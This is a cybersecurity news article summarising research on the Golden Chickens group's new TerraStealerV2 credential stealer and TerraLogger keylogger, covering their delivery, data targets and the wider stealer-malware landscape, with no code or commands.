According to cybersecurity researchers at Recorded Future’s Insikt Group, TerraStealerV2 is designed to steal browser credentials, cryptocurrency wallet data, and information from browser extensions. On the other hand, TerraLogger is a standalone keylogger that records keystrokes using low-level keyboard hooks and saves the data in local files.
Golden Chickens has been active since at least 2018 and is known for offering its malware under a Malware-as-a-Service (MaaS) model. The group has ties to a known online identity called badbullzvenom, believed to be operated by individuals from Canada and Romania. Their previously known malware includes More_eggs, VenomLNK, TerraLoader, TerraCrypt, and RevC2.
Technical Details of the New Malware
TerraStealerV2 is distributed through various file types such as EXE, DLL, MSI, and LNK files. In all cases, the malware payload is delivered as an OCX (OLE Control Extension) file retrieved from an external domain, wetransfers[.]io.
While TerraStealerV2 targets Chrome’s 'Login Data' to steal credentials, it does not bypass Chrome’s Application Bound Encryption (ABE), introduced in updates after July 2024. This suggests that the malware is either outdated or still being developed.
The stolen data is sent to both Telegram and the wetransfers[.]io domain. The malware also uses trusted Windows tools like regsvr32.exe and mshta.exe to avoid detection.
TerraLogger, also delivered as an OCX file, focuses on recording keystrokes but does not currently include features for data exfiltration or command-and-control communication. Experts believe it may be used alongside other malware tools within the Golden Chickens ecosystem.
Growing Threat Landscape
Security experts say these tools are still under active development and lack the stealth typically seen in mature Golden Chickens malware. However, the group's history indicates that more advanced versions are likely to emerge in the future.
The discovery of TerraStealerV2 and TerraLogger comes at a time when several new stealer malware families have also been identified, including Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer. These programs are designed to steal a broad range of personal and sensitive information.
In addition, an updated version of another malware, StealC (version 2.2.4), was spotted in March 2025. It includes improved delivery through MSI and PowerShell scripts, encrypted communications, and a new control panel with advanced customization features. StealC V2 is being spread using another malware loader known as Amadey.
Cybersecurity experts continue to monitor these developments closely, warning that cybercriminals are increasingly using sophisticated methods to target victims and steal data.
Tags:
Cybercrime in World
